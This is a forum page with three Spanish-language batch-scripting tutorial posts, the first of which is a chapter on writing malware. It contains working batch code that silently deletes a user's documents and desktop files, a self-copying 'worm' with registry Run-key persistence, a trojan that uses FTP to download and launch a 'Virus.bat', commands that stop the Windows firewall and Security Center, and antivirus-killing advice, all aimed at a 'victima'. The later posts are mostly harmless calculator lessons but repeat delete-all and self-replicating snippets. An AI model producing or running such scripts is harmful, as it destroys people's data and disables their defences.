elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: 1 2 [3] 4
21  Programación / Scripting / Manual Batch (NM 2da Parte) "Malware" By 2Fac3R en: 20 Octubre 2011, 22:34 pm
PARTE DEDICADA AL MALWARE!

Hola compañeros foreros, este tutorial esta dedicado principalmente a HxC I-H, MH y Cuh (en donde soy Gaara_18) entre otra comunidades en donde ando, recordarque esta es la segunda parte del Manual Batch (Nivel Medio) By 2Fac3R/RocKeG, y esta parte esta dedicada a los Malwares, esta será la parte mas extensa del manual asi que preparence, los temas que veremos aquí serán, Bucle, Virus, Worms, ProcessKiller, AvKiller y Troyanos, también mencionar que no me hago responsable de el mal uso del que le den a esta información, únicamente lo hago con el fin de que aprendan a hacer sus programas en Batch, sin mas hire por el orden mencionado asi que manos a la obra!!!:

Ya había mencionado lo de los Bucles, y se los había dejado a su búsqueda, ahora veremos varias formas de hacer un Bucle, vamos a un ejemplo sencillo de un Bucle infinito:
Código:
@echo off
:inicio
Start [url=http://www.hackxcrack.es]www.hackxcrack.es[/url]
Goto :inicio
Exit
Este código lo que hara seia crear una etiqueta llamada “:inicio” y abre el foro de HxC infinitamente hasta que la pc se trabe, ahora vamos a un pequeño Bucle con diferentes cosas:

Código:
@echo off
:inicio
Start /min [url=http://www.hackxcrack.es]www.hackxcrack.es[/url]
Start/min [url=http://www.masters-hackers.info]www.masters-hackers.info[/url]
Start/min [url=http://www.foro.el-hacker.com]www.foro.el-hacker.com[/url]
Start/min  [url=http://www.i-hacker.info]www.i-hacker.info[/url]
Start
Goto:inicio
exit
Lo que hace el code es simple, aprovecho para invitarlos a que vayan a estas comunidades donde me he sentido muy bien en ellas , bien, el bucle no es tan interesante, únicamente es para hacer una pequeña bromita, pero recuerda que hacer mucho esto es de lammers , asi que solo háganlo para aprender como funka :p, ok seguire con los Virus, que este concepto se tiene muy diferente por los que andamos en esto del Hacking, en lo personal para mi un Virus es un archivo que solo se encarga de destruir mas archivos, con el fin únicamente de Ch1nG4R al administrador de la pc, no recomiendo que distribuyan sus ‘Virus’ porque para mi eso es de lammers, pero bueno sigo con el code, dado mi discurso, sabemos que un virus es para borar archivos asi que supongo que sabras como esta compuesto un virus en Batch.
-Mmm… con “Del”?-
Exacto! Entonces vamos a codear, bien ¿Qué queremos que haga nuestro Virus?, mmm… pues empezare con un simple virus que destruya todos los archivos de la carpeta “Mis documentos”, para ello es necesario conocer las variables de entorno para este caso vamos a usar una que llevamos usando.
Citar
–Ahh ya sé! %homepath%-

Exacto!, vamos al code.

Código:
@echo off
Del  %homepath%\Mis documentos\*.*
Exit
[COLOR="red"]NO LO EJECUTES!!![/COLOR]

Antes decirte que este code para ser Virus pues no nos funcionaria porque pide confirmación para que elimine los archivos y lógicamente la victima no lo ejecutara, entonces para que nos funcione vamos a usar algo mas reforzado, usaremos el comando “attrib” y los parámetros de “del”, vamos a cmd y tecleamos “del /?” (sin comillas) y veamos que nos sale…:
Código:
Elimina uno o mas archivos.

DEL [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres
ERASE [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres

  nombres       Especifica una lista de uno o m s archivos o directorios. 
                Se puede utilizar comodines para eliminar varios archivos.
                Si se especifica un directorio todos sus archivos se eliminar n.
     

  /P            Pide confirmaci¢n antes de eliminar cada archivo.
  /F            Fuerza la eliminaci¢n de archivos de s¢lo lectura.
  /S            Elimina archivos especificados en todos los subdirectorios.
  /Q            Modo silencioso. No pide confirmaci¢n con comod¡n global
  /A            Selecciona los archivos que se van a eliminar bas ndose en los
                atributos
  atributos     R  Archivos de s¢lo lectura       S  Archivos de sistema
                H  Archivos ocultos               A  Archivos preparados para
                                                     almacenamiento
                -  Prefijo de exclusi¢n

Si las extensiones de comando est n activadas DEL y ERASE cambian de la siguiente manera:

La sem ntica que se muestra para el modificador /S est  invertida de tal modo
que le muestra solamente los archivos eliminados y no los que no se encontraron.

Analicemos los parámetros, nos dice que el parámetro “/f” fuerza la eliminación del archivo, pues vamos a usarlo, usaremos también el “/s” para que elimine en todos los subdirectorios  y usaremos “/q” para que sea ‘Silencioso’.
-¿Entonces como quedaría el code?-
Pues el code quedaría asi:
Código:
@echo off
Attrib –r –a – s –h “%homepath%\Mis documentos\*.*
Del /p /q /s “%homepath%\Mis documentos\*.*
Exit
-
Citar
Ohh crei que se te había olvidado lo del comando Attrib que mencionaste que usaríamos pero ahora veo que no -
Pues ya ves que no :p, entonces ese seria el code, no lo ejecuten en su maquina a menos que tengan una maquina virtual para este tipo de pruebas, si eres mas avanzado quizás pienses:
Citar
-Que le pasa a este man, porque no usa for y se deja de escribir tanto código-
Claro!, creo que tienes algo de razón pero como he dicho a lo largo de estos manuales que lo dejare a tu búsqueda, pero no te preocupes va a llegar algún momento en donde explique el comando, todo a su tiempo :p. Antes de continuar lo dejo a su imaginación ‘que borran’ con su pequeño virus en Batch, recuerden que sabiendo como funka una pc podrán borrar ciertos archivos y dejarla inservible (para algunas victimas, otras no son tan tontas y pueden recuperarse bajo este tipo de ‘ataques’, pero pues son menos que las que no ) , bien sigamos con lo que nos interesa, ahora les mencionare ‘como’ hacer un worm, ya habíamos hecho uno en el primer manual, pero era muy simple para que nos interesara al 100, pues ahora voy a suponer que tienes tu “virus” y lo quieres propagar (o saber como se propaga con Batch ) , lo que vamos a hacer con nuestro virus es copiarlo a la carpeta “system32” y agregarlo al registro para que se inicie con Windows ?, quizá esto te suene a Chino, pero es aquí donde se va a alargar este tuto, voy a explicar el uso del registro (brevemente, ya sabes, si quieres algo mas complejo busca por Google|Altavista|Yahoo  o el que desees), también explicare el uso del For
Citar
-Por fin!!!, el famoso for!-
Y varias cosillas mas, bueno primero les mostrare el code e ire explicándolo:
Código:
@echo off
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VIRUS.bat /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f

Copy %0 %windir%\system32

Exit
Con eso es mas que suficiente, lo demás lo dejare a su búsqueda ya que no me gusta este tipo de cosas, solo las explico para que aprendan como funciona y como defenderse de ellas, bueno explico; Lo primero es cuando se agrega al registro, en este caso se va a agregar al Run, para que se inicie con Windows, donde dice “VIRUS.bat” es donde vas a poner la ruta del “Virus” que hemos creado o poner la ruta del programa que quieres que se incie con Windows ,  la siguiente línea les debe ser conocida ya que ya la habíamos usado anteriormente, pero por si se te había olvidado, se copia a si mismo en la carpeta system32 que esta en la carpeta “Windows”. En este caso les dejare una tarea xD, espero que la hagan no como en la escuela que no las entregan xD, la pequeña tarea es que se copie a cualquier dispositivo USB que se conecte, te dare una pista; Usa el comando “IF exist” que seguramente ya lo habías buscado por ahí, puedes mandármelo por mp o simplemente postearlo en los foros anteriormente mencionados o de donde sacaste este manual (Excepto Taringa xD). Muy bien, sigamos con el manual, empezaremos con un pequeños Taskkiller (Asesino de procesos), esto nos servirá para poder sacar del juego casi cualquier proceso (esto incluye el de los AntiVirus (AV), los comandos que aprenderemos en este tuto son el Tskill o TaskKill y tasklist. Nosotros utilizaremos tskill, bien voy a un ejemplo simple de su uso, primero abriremos el internet explorer ?

Código:
@echo off
Tskill 1716
Exit

-
Citar
Como pero asi de fácil?-
Claro esto es muy fácil, lo único que tienes que hacer es poner el nombre del proceso a eliminar.

¿Pero como le hago si quiero eliminar otro proceso?, explicame otro ejemplo para tenerlo mas claro, además no entendí porque ese numero -

Bien, te explicare otro, abre la calculadora del Windows.


Inicio --> Todos los programas --> accesorios --> calculadora :D

Ahora ve al cmd (inicio --> ejecutar --> cmd ? enter) y teclea “tasklist”
Te ha salido una lista de los procesos que se están ejecutando en este momento, pues busca ahora el de la calculadora, Deberias haber encontrado un proceso llamado “calc.exe” con un pid de 544, pues adivina… Ese es el nombre que vamos a poner después de tskill, vamos al code:

Código:
@echo off
Tskill 544
Exit

Y ejecutalo, recuerda que no deberías de haber cerrado manualmente la calculadora antes, osea tiene que estar activa en el momento de que la ejecutes :D. Si eres un poco curioso te habras dado cuenta de que no has podido cerrar el proceso del AV, pues eso es algo mas complejo, para poderlo cerra primero debes saber que servicios lo están ‘Protegiendo’ pero ese tema se sale de esto asi que lo dejare a tu búsqueda, para que busques específicamente de tu AV :p, entonces buscado esto sabras como hacer un AVKiller, que es un programa en el que primero se quitan los procesos del AV y después elimina por completo de donde se instalo, busca y busca seguro encontraras :D.Pero por si no encuentras en la próxima parte prometo poner un buen code de AVKiller ? si es que veo que hay gente que lo hace xD, Lo que sigue para mi es lo mejor, ya sabran los de HxC me ha pegado eso de poner lo mejor al final xD, asi que iremos a lo mejor que es el Troyano, en este caso lo voy a hacer con el comando Ftp (que seguro ya sabes lo del FTP porque te haz leído las revistas ;) básicamente combonare varias cosas que hemos estado viendo en este manual.

VAMOS A CREAR UN TROYANO EN BATCH!!!

Bien empezare por explicarles el code que es este:
Código:
@echo off
Echo USER>Troj.tmp
Echo PASWORD>>Trojan.tmp
Echo get Virus.bat>>Trojan.tmp
Echo bye>>trojan.tmp
Echo quit>>trojan.tmp
Start –s:Trojan.tmp  Servidor de FTP
Del /f /s /q Trojan.tmp
Start/min  Virus.bat
Copy %  %windir%\system32
Exit
Vamos a crear un archivo llamado “Trojan.tmp” con las siguientes características:  Abrir el ftp poniendo nuestro nombre de usuario (que el lo que sustituiras para que te funcione al 100, después ponemos la contraseña que tenemos para usar el ftp, y vamos ahora a los comandos del ftp si vamos al cmd y tecleamos “ftp /?” veremos que nos dara error y automáticamente nos abrirá el servicio FTP, ahora ahí dentro ponemos “help” (sin las comillas) y nos saldrán los comandos que podemos utilizar en el servicio FTP dentro de nuestro cmd o bat, voy ahora a explicar unos cuantos que nos servirán como ayuda para nuestro pequeño troyano en batch, los comandos son, put, get, del, cd, mkdir, rename y rmdir.  Los demás los dejare a su búsqueda, empecemos el comando del ftp “put” nos sirve para subir un archivo a nuestro  servidor ftp, vamos a hacerlo en la cmd vamos a teclear “ftp” (recuerda que sin las comillas :D) y nos ha salido esto: 
 
 

No recuerda que no soy adivino xD. Bien ahora tecleamos nuestro servidor ftp, en mi caso es Anime online :D, aprovecho para invitarlos a mi web.  Ok sin mas vamos a la practica tecleamos “open www.elanime.do.am” (recuerda que debes sustituir por el nombre de tu servidor de ftp) y nos saldrá esto:
 
Ahora debemos poner el nombre de nuestro usuario y contraseña, y nos saldrá esto:
 

Bien ahora estamos adentro de nuestro servidor ftp, vamos a hacer algo, subiremos y descargaremos archivos. Vamos al put , get y “dir”,
-Pero que has dicho? “Dir” es un comando del batch no?-
Claro veo que has estudiado por tu cuenta, recuerda que este manual es solo un pequeño “amigo” para aprender cosas que en otros manuales no he visto :D, bien sin mas vamos al ejemplo, vamos a hacer un dir. Vamos teclea “dir”
 
El dir nos listara los archivos que tenemos en nuestro ftp, y vemos varios archivo voy a bajar en especifico 1 y subiré un archivo de “prueba.txt”, basta de teoría y vamos al ejemplo:
 
Como ven si le damos enter nos descargara el archivo mencionado, que es “libro3.jpeg” que en este caso es una imagen del 3er libro del Avatar xD (el libro fuego),
 
Este es el resultado que tienes que tener, ahora vamos a ver si nos la ha descargado en realidad:
 

xD disculpen que este tan distorsionada pero era para que se entendiera el ejemplo xD, sigamos, ahora vamos a subir un archivo, vamos a la cmd de nuevo, y tecleamos “put prueba.txt” (recuerda que yo subiré este archivo que esta en %homepath%
-¿Por qué ahí?-
Pues si te haz fijado en la primera imagen, al iniciar la cmd me aparece esa ruta por defecto, pondré la imagen nuevamente :
 
Vemos, que nos aparece en donde dije, esto puede varias depende de la configuración de la pc, asi que no te asusten ni pienses que no te funcionara si no tienes esta ruta :D, bien vamos a continuar.
Bien, se supone que haz intentado teclear “put prueba.txt” que en mi caso tiene que estar en %homepath% osea en la carpeta del usuario (si no entiendes esto del %homepath% leete las partes anteriores del manual).
Vamos a la imagen para que vean que funciona :D

Bien funciono, ahora vamos a hacer un dir para verificar que este ahí :D.
 

Aquí estamos viendo el archivo “prueba.txt” (a la derechar) subido correctamente y lo demás que esta subrayado son los informe del archivo subido,  ok ya entendido todo esto sabemos como funciona el servidor FTP y hemos hecho una prueba de subir y bajar archivos. Ahora vamos a transformarlo a batch y no solo en cmd, vamos a nuestro code de ejemplo el cual sube el prueba.txt y baja “libro3.jpeg”.
Código:
@echo off
Echo USUARIO>trojan.tmp
Echo PASSWORD>>trojan.tmp
Echo put prueba.txt>>trojan.tmp
Echo get libro3.jpeg>>trojan.tmp
Echo bye>>trojan.tmp
Echo exit>>trojan.tmp
ftp-s:trojan.tmp [url=http://www.elanime.do.am]www.elanime.do.am[/url]
exit
Este es un simple “Troyano” el cual se puede hacer muchísimo con esto, cabe decir que si el puerto necesitado por el ftp es el 23 como muchos ya sabran y pues si el puerto esta cerrado esto no funcionara, tampoco funcionara en caso de que el firewall nos bloquee el paso, para ello tenemos que hacer varias combinaciones de nuestros códigos, por ejemplo primero cerraremos el firewall para ello necesitamos este code:
Código:
@echo off
Net Stop “Centro de Seguridad”
Net Stop “Firewall de Windows/Conexión compartida a Internet (ICS)”
Exit
Tambien mencionar que este code solo desactiva el firewall de Windows, si nuestra ‘Victima’ tiene otro Firewall como el ZoneAlarm no funcionara ?, pero recuerden que lo dije en un principio :D.
Entonces lo dejo a su imaginación, recuerden lo que hemos visto en esta parte, worm, virus, bucles, AvKiller, etc. Y si le hechan imaginación seguro podras sacar sin problemas al firewall y al AV para poder meter nuestro pequeño “amiguito” (supongo que sabes a que me refiero no ;D. Sin mas esta es la ultima parte “Publica” por el momento ya que unire varias partes y mejorare el manual para dejarlo en uno solo y participar en el concurso de HxC, asi que por el momento seria todo, apréndanse bien todo porque cuando regrese, regresare mas que nuca, además anticiparles que quizá haga en un futuro un manual de HTML con mi estilo de ‘Explicar’ las cosas :D.
Les recuerdo que pueden hacer con este manual lo que se les ocurra y se les antoje, menos decir que ustedes lo hicieron xD, recuerden mencionar el Autor del Manual (Gaara_18|2Fac3R|RocKeG), sin mas decirles que este manual fue hecho específicamente para HxC y I-H! pero en las otras comunidades donde ando también lo posteare para que me critiquen (no muy gacho por favor xD).
Me despido
2Fac3R

PDF:

DESCARGAR -->Multiupload.com - upload your files to multiple file hosting sites!

NOTA: EN EL MANUAL menciono IMAGENES NO HE SUBIDO (AUN) LAS IMAGENES SI QUIERES VERTELO POR EL MOMENTO, BAJATE EL PDF QUE VIENE CON LAS IMAGENES :D ASI QUE PONGANSE A ESTUDIAR.
PD: LAS SIGUIENTES VERSIONES NO SALDRAN ANTES DE QUE TERMINE EL NUEVO CONCURSO DE HXC DE LOS MANUALES, AI SE LEEN LA ULTIMA PARTE VERAN.
ZALU2
22  Programación / Scripting / Manual Batch (Nivel Medio) By 2Fac3R en: 20 Octubre 2011, 22:33 pm
Hola amigos espero les haya gustado el manual "Batch desde -1" que hice, mencionar que ese manual lo hize hace como 4 meses donde estaba metido al 100% con el Batch y no es por Fardar pero me quedo uff! xD, bueno en este segundo manual de Batch explicare mas a fondo varias cosas y como ya sabran algunas cosas se las dejare a su busqueda, mencionar tambien que este manual pienso que va a ser el mas extenso dado que para llegar a nivel 'avanzado' es algo mas de tiempo, bueno sin mas discursos empiezo:

Me ire a comandos nada mas, empezare por el "ATTRIB" (recuerda sin las comillas ;D) este comando lo que hace es quitar y agregar atributos a los archivos, veamos un ejemplo:

Código:
@echo off
attrib +h "%homepath%\escritorio\prueba.txt"
exit

Lo que nos hara este code es ponerle el atributo de "oculto" a nuestro programa que seguramente hemos creado en el escritorio llamado "prueba.txt", ahora ve al escritorio y dale click derecho --> propiedades --> General y hasta abajo nos saldra tildada la casilla de "oculto". Y para quitarle el atributo de oculto hacemos esto:

Código:
@echo off
attrib -h "%homepath%\escritorio\prueba.txt
exit

Ahora compruebalo y veras que es cierto :D. Antes de que se me olvide si quieres checar todas las variables de entorno que hay ve a cmd y teclea esto "set>vEntorno.txt" (sin las comillas) y encontraras un .txt donde estaran todas las Variables de entorno. Bien dicho esto aprovecho para explicar los "redireccionamientos" como sabran no soy muy bueno explicandome asi que voy a la practica, este es nuestro code que crea un archivo txt llamado "red" que tiene en su interior "Manual" y lo sobreescribe con "By 2Fac3R".

Código:
@echo off
echo Manual>red.txt
echo By 2Fac3R>>red.txt
exit

Prueben con las variables de entorno para que ustedes eligan donde se cree el txt, xD me estoy acordando de cosas que no habia explicado como los "&&", "|", "??" y "*". Bien de uno en uno los hire explicando. Vamos con un ejemplo del "&&".

@echo off
start CCleaner && start http://www.hackxcrack.es
exit

Lo que hace este pequeño code es simple, abre el CCleaner.exe y al finalizar de abrirlo va al navegador por defecto y abre el foro de hackxCrack. Ahora sino tienes el CCleaner donde estas ejecutando el code trata y veras que te dara error :p. Bien el de "|" lo explicare en un futuro donde sera utilisimo para el AVKi... :rolleyes: ya lo sabran xD, bien ahora explicare el "??", lo que hace esto es sustituir por ciertos digitos (sigo sin saber explicarme, espero se me quite en un futuro), bien vamos a un ejemplo, lo explicare junto al "*".

Código:
@echo off
del ???.*
exit

Lo que hace este code es borrar todos los archivos que tengan 3 digitos en su nombre y con cualquier extension.

Citar
-Ahh ya he captado lo del asterisco ("*") entonces...-

vamos a otro ejemplo

Código:
@echo off
del *.*
exit

Este lo que hace es borrar todos los archivos donde se esta ejecutando nuestro bat.

Citar
-Muajajajaja!!! entonces esto lo podria comvertir en un Virus!!!-

Claro, claro pero todo a su tiempo, habra un manual dedicado a los Malwares asi que esperalo con ansias :p.

Bien entendido esto sigo con los comandos: El siguente comando es:

"CD": Este comando es para poder subir a ciertos directorios, por ejemplo si estamos en C:/ y queremos ir a la carpeta windows dentro de nuestro bat hacemos esto:

Código:
@echo off #Suponiendo que estamos en la ruta de nuestro HD que en este caso seria "C:/"
cd windows #Ahora estamos en la carpeta "Windows"
exit

Citar
-Para que me sirve esto?-
Pues la respuesta es muy simple, en caso de que nos queramos ir a la carpeta "system32" que esta en Windows y crear un archivo txt, hariamos esto:

Código:
@echo off
cd %homedrive%
cd %windir%
echo Hola mundo>archivo.txt
exit

Seguro pensaste en esto no?, pues si lo pensaste andas algo cerca, con un "Cd %windir% hubieramos llegado a nuestro destino, este comando (en lo personal sirve muy poco) mas bien seria un comando mas xD, pero seguro le sacaran provecho :p. No por esto se brinquen esto que en un futuro lo ocuparemos aprendido:D. Como resumen es otra forma de hacer las cosas en Batch :D. Bien se me ha olviado el "C..", este sirve para retroceder a la carpeta anterior de donde estes. 
Me gustaria aclarar varias cosillas :p, de los manuales anteriores, el comando "del" funciona igual que el "erase", el "md" funciona igual que el "mkdir", el "Rd" = "Rmdir", asi que usen el que mas les guste :D. Y el siguiente comando mas explicado (que vimos en las clases anteriores :D) es el "if", ahora a fondo:

[SIZE="4"]Nuestra segunda Calculadora pero ahora mas UTIL[/SIZE]

Bien, retomemos el code del primer manual que era:

Código:
@echo off
echo Bienvenido a mi primer programa util, xD.
:Elegir
echo ¿Que quieres hacer?
echo.
echo 1. Sumar
echo 2. Salir
set /p hacer=
if %hacer%== 1 goto :sumar
if %hacer%== 2 goto :salir
cls
:Sumar
set /p num=  Escribe el primer numero a sumar
cls
set /p num2= Escribe otro numero
cls
set /a res=%num% + %num2%
echo el resultado es %res%
pause
cls
echo ¿Quieres sumar otra vez?
echo.
set /p sov=  Si/No
if %sov%==si goto :Sumar
if %sov%==no goto :Elegir
:Salir
echo Esta fue la primera calculadora que hago en Batch
pause
exit.

Ahora la haremos algo mas 'Compleja'. Manos a la obra!!!
Pondremos las opciones de restar, multiplicar, sumar y dividir, pondremos una interfaz mas amigables, un buen titulo y un mensaje de despedida. Recordemos que para sumar es +, restar -, dividir /, y multiplicar *. Sin mas vamos al code:

Código:
@echo off
title Mi segundo programa util
color  9
echo Bienvenido a mi SEGUNDO programa util, xD.
:Elegir
echo ¿Que quieres hacer?
echo.
echo 1. Sumar
echo 2. Restar
echo 3. Multiplicar
echo 4. Dividir
echo 5, Salir
set /p hacer= ._
if %hacer%== 1 goto :sumar
if %hacer%== 2 goto :Restar
if %hacer%== 3 goto :Multiplicar
if %hacer%== 4 goto :Dividir
if %hacer%== 5 goto :Salir
cls
:Sumar
set /p num=  Escribe el primer numero a sumar._
cls
set /p num2= Escribe otro numero._
cls
set /a res=%num% + %num2%
echo el resultado es %res%
pause
cls
goto:elegir
:Restar
set /p nume=  Escribe el primer numero a Restar._
cls
set /p numer= Escribe otro numero._
cls
set /a res1=%nume% - %numer%
echo el resultado es %res1%
pause
cls
goto:elegir
:Multiplicar
set /p num= Escribe el primer numero a Multiplicar._
cls
set /p num2= Escribe otro numero._
cls
set /a resm=%num% * %num2%
echo el resultado es %resm%
pause
cls
goto:elegir
:Dividir
set /p num= Escribe el primer numero a Dividir._
cls
set /p num2= Escribe otro numero._
cls
set /a resd=%num% / %num2%
echo el resultado es %resd%
pause
cls
goto:elegir
:Salir
echo Esto fue la primera calculadora "Compleja" que hago
pause
exit.

Analicen el code y veran como lo entienden, bien la explicacion la deberia de dar pero, la dare, primero nuestro programita nos pregusta que ¿que queremos hacer?, y cuando le respondemos guarda la respuesta en una variable con "set /p" y va directo al "if" el comando lo que hace es que si la respuesta es 1 va a :Sumar, si es 2 va a :Restar si es 3 va a (go to :...) etc. Despues de ello, al estar especificamente en la suma nos pide un numero, despues otro y los guarda en variables distintas, despues el set /a se encarga de hacer la operacion y el echo nos muestra el resultado, despues nos borra la pantalla y va al inicio. Y asi sucesivamente hasta que le demos en el 5 que es la opcion de salir. Con esta calculadora mas compleja nos permite entender varios comandos, como: el if (aunque sea lo mas basico) goto, las etiquetas, el "cls" que es para borrar la pantalla y los que se encargan de las variables "set /p y Set /a".

Si han entendido al 100 el code, les sera mucho mas facil las siguientes partes ;D, bien ahora quiza muchos estan artos de los ejemplos del "Hola Mundo" y la "Calculadora" no tan util como en los tutos dicen, pero sepan que la intencion de hacer una calculadora en este manual no es que ustedes puedan sumar y restar con ella, sino que entiendan mas o menos como se 'programa' en Batch, asi que [SIZE="3"]NO TE SALTES ESTA PARTE!!! Y ENTIENDELA BIEN PORQUE EN LA SIGUIENTE PARTE TE SERA UTIL!!![/SIZE], sin mas me despido de esta pequeña parte y decirles o adelantarles que la siguiente parte quiza sea la mas extensa y va a ser orientada a "MALWARE" asi que no se la pierdan!!!.
[SIZE="4"]BY 2Fac3R[/SIZE]

PD: Repito lo que en el primer manual, este tuto es libre, pueden hacer con el lo que se les antoje, postearlo en otros foros, etc, etc, pero con la condicion de que mencionen al Autor (2Fac3R o RocKeG).:cool:
Zalu2


PDF:

PRIMERO --> http://www.multiupload.com/HDQD1WUKVV
2DA PARTE --> http://www.multiupload.com/6MEG25RG5U
NIVEL MEDIO --> http://www.multiupload.com/UFE74WZ1JW
23  Programación / Scripting / Manual Batch 2da Parte (By 2Fac3R) en: 20 Octubre 2011, 22:30 pm
Hola de nuevo batchers newbies, espero que les haya gustado la primera parte de este manual, les recuerdo que soy 2Fac3R aka RocKeG (como quieran llamarme), en la primera parte vimos lo mas basico de batch, "que es?", "que podemos hacer?", "comandos basicos" y otras cosas, supongo que ya te haz estudiado varios comandos y y haz practicado con ellos como lo hemos hecho con "md" y otros. Bien ya me conocen me extiendo mucho asi que vamos al grano.

Bien en esta 2ª parte voy a enseñarte mas comandos y mas cosas que haremos.
Empecemos;

VAMOS A HACER UNA CALCULADORA:

Primero que nada voy a explicar desde cero lo de las variables y como las utilizaremos
en la calculadora, como ya sabemos las variables varian xD dependiendo el contenido
que deseemos darle a tal variable vamos por un ejemplo que explique en la parte
anterior. Vamos a crear un programa donde preguntemos el nombre completo, la edad y lo que te gusta de la programacion en batch, vamos al code:

Código:
Código:
@echo off
echo Hola
echo ¿Cual es tu nombre completo?
set /p nombre=
cls
echo ¿Cuantos años tienes?
set /p edad=
cls
echo ¿Que te gusta en el Batch?
set /p gustos=
cls
echo Hola %nombre% tienes %edad% años y lo que te gusta en el batch es %gustos%
echo espero que sigas estudiando :)
pause>nul
exit

Ahi esta nuestro codigo, vamos al grano con nuestra calculadora.
Bien lo que queremos hacer sera primero que nada que nuestra calculadora sume.
El codigo que voy a usar es "+" (mas) Vamos a hacer la calculadora. Vamos a
nuestro famoso algoritmo sintetizado, el programa lo que tendra que hacer sera que
nos pregunte un numero, despues otro y despues que los sume y nos muestre el
resultado en pantalla. Aqui hay un ejemplo simple:

Código:
Código:
@echo off
echo Bienvenido a mi primer programa util, xD.
:Elegir
echo ¿Que quieres hacer?
echo.
echo 1. Sumar
echo 2. Salir
set /p hacer=
if %hacer%== 1 goto :sumar
if %hacer%== 2 goto :salir
cls
:Sumar
set /p num=  Escribe el primer numero a sumar
cls
set /p num2= Escribe otro numero
cls
set /a res=%num% + %num2%
echo el resultado es %res%
pause
cls
echo ¿Quieres sumar otra vez?
echo.
set /p sov=  Si/No
if %sov%==si goto :Sumar
if %sov%==no goto :Elegir
:Salir
echo Esta fue la primera calculadora que hago en Batch
pause
exit.
Bien, esta calculadora es simple, solo con sumar y salir en sus opciones, haz de
pensar
Citar
--Que coño hiciste que es eso de if %hacer%==1 o 2 goto :Sumar. No aprendere nada
si no me explicas!!!--

Bien voy a explicarte, el comando "if" (sin comillas) nos hace algo "sì" pasa algo
sino no. El ejemplo es claro nos dice elige entre 1 y 2 y luego el comando "if" nos
dice si en la variable, el resultado es igual a 1 ir a tal etiqueta (etiqueta es
como un menu que se hace con :menu), en la otra si el resultado es "2" goto (ir a)
:Salir (etiqueta). Esa es una de las utilidades de "IF", despues veremos otras.
Ahora te toca a ti hacer una calculadora que sume, reste, divida y multiplique, los
codigos que tienes que usar son estos:

+ = Mas (Sumar)
- = Menos (restar)
* = Por (Multiplicar)
/ = Entre (Dividir)
= = igual (Resultado)

Antes de que se me olvide el comando "set /a" hace operaciones y los guarda en
variables, ejemplo:

Código:
Código:
echo Suma
set /a res= 1+1
echo %res%
Código:
Código:
echo Multiplicacion
set /a res1= 10/1
echo %res1%

Y asi lo de mas es historia, espero que hayas entendido lo de la calculadora, sino
postea tu duda, comentario o critica.
Vamos ahora con lo del bucle.


¿QUE ES UN BUCLE?

Un bucle es cuando un codigo se repite ciertas veces, por ejemplo en nuestro codigo
hacemos que el comando "start" se repita 10 veces y ese seria un bucle, tambien los
bucles pueden ser infinitos, que el comando start se repita infinitamente. Vamos a
un ejemplo:

Código:
Código:
@echo off
start
start
start
start
start
start
start
start
start
start
exit
Citar
--¿Que es lo que hace?--
Simple, inicia la consola de ms-dos 10 veces.
Citar
--Pero que flogera estar escribiendo 10 veces start para que se habra tal veces--
Si pero eso se te va a facilitar si hechas un poco de imaginacion. (como ya he dicho antes, no les dare todo a la mano, tampoco lo busquen en internet a menos que no den con el resultado, no es que yo sea malo, o no sepa como hacerlo, sino que esto te servira para no ser tan flojos y piensen un poco en lo que deben hacer).

Vamos por otro ejemplo:
Vamos a iniciar un bucle infinito con una gran ayuda que es la etiqueta.

Código:
Código:
@echo off
:inicio
start
goto :inicio

Lo que hace esto es, crea una etiqueta llamada "inicio" despues en esa etiqueta
se coloca el comado start, despues se va otra vez a inicio. Lo cual el codigo
primero inicia ms-dos despues como se regresa a esa etiqueta se activa otra vez el
codigo, y asi sucesivamente.
Si eres avanzado seguramente diras:
Citar
--Que tonto, eso se puede hacer en 2 lineas de codigo, y segun el lo esta
sintetizando en 4--
Si, si estas en lo correcto (excepto por lo tonto, xD) recuerda que estoy dejando
la mayor parte a la imaginacion del nuevo usuario de batch. Que chiste tendria
decirle como hacerlo si solo lo copea y ya esta, no lo veo un buen aprendizaje,
sino eres de los que quiere aprender con mi metodo, busca otros manuales que hay
en la red (Que son muchisimos).
Bien dado mi discurso, voy ahora a explicar codigos que la mayoria los usamos en los
virus.
Citar
--Milagro!!!, por fin voy a aprender lo que me gusta, LOS VIRUS!!!.
Si, si eso es lo que la mayoria de los nuevos usuario quiere aprender, incluso hay
unos que empiezan (o empezaron) buscando "¿Como hacer un virus en Batch?" y asi
llegaron a este foro o quizas a aprender C. Yo en lo personal es lo que mas me
interesa, la programacion y los malwares.
Supongamos que ya sabes lo que es un malware, ya sea virus, worm, troyano, etc.
Partiremos por hacer un simple virus que borre todos los archivos del escritorio.
el codigo sera:

Código:
Código:
@echo off
del %homepath%\escritorio\*.*
exit

Este simple code utiliza el comando del (delete) o sea borrar en español o eliminar
Tambien podemos hacerlo con "erase", seria el mismo code pero remplazamos el del
por erase y hace exatamente lo mismo, si quieres mas detalles recuerda usar el "/?".
Recuerda que estamos utilizando una variable de entorno para que nos funcione en
cualquier pc sin tener que especificar la ruta que por lo general seria esta:

Código:
C:\Documents and Settings\Usuario\Escritorio

Recuerda que es la mas usada pero hay muchisimos usuario que no tienen "c:\" sino
"Cualquiera:\". Bien ahora vamos a crear un worm lo cual es un gusano, lo que hace
el gusano es repetirse simualtaneamente a si mismo y/o copiarse en otras carpetas
hasta llenar el disco duro, vamos con el ejemplo se va a autocopiar solo una vez en
nuestro escritorio y se va a copiar en el usuario.

Código:
Código:
@echo off
copy %0 %homepath%\escritorio
copy %0 %homepath%
exit

Ejecutalo y veraz que en %homepath%\escritorio se ha creado el mismo archivo que
lo creo (que juego de palabras) tambien en %homepath%, el "%0" sirve para referirnos
al archivo que se esta ejecutando, vamos por un ejemplo mas complejo suponiendo que
nuestro archivo se llama "prueba.bat":

Código:
Código:
@echo off
copy %0 %homepath%\escritorio
copy %0 %homepath%
start %homepath%\escritorio\prueba.bat
start %homepath%\prueba.bat
del %0
exit

Explicamos el code, nos copea el mismo archivo que se esta ejecutando a el escritorio
y al usuario, despues se ejecutan los archivos nuevos copiados a tal carpeta y
despues se elimina el propio archivo para que no haya "rastro". Recuerda que puedes
